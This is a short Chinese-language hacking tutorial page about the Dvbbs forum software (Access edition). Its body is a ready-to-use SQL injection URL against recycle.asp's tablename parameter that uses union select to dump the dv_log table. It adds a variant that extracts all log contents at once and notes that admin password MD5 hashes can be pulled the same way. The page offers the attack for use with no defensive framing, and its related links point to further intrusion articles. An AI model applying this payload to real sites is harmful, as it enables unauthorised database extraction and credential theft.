手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >动网access版暴log库终极大法
动网access版暴log库终极大法
摘要:注:需要获得前台管理员权限后使用文章中指定recycle.asp?tablename=Dv_bbs1%20union%20select%20...

注:需要获得前台管理员权限后使用

文章中指定recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000(回收站的最后页的id),指变换l_id=‘'的值来暴出l_concent的值一次只能暴一个内容,看了下动网的数据库表,只要指定l_announceid=0就可以全部暴出,语句这样构造recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_announceid=0%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000嘿嘿,是不是全部暴出来了,构造适当的语句可以暴出管理员的后台md5值等等内容。另注:暴出数据字段的内容是回收站帖子的最后页!

【动网access版暴log库终极大法】相关文章:

文件上传八大法-远程控制必看

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)

从广告邮件到肉鸡成群(图)

典型入侵日志分析

字符集导致的浏览器跨站脚本攻击分析

几天之内做到飞速提升排名

我是如何发现CCProxy远程溢出漏洞的

打造完美的IE网页木马

黑客攻击揭密--分析选定的网络攻击

upfile上传漏洞的利用总结

精品推荐
分类导航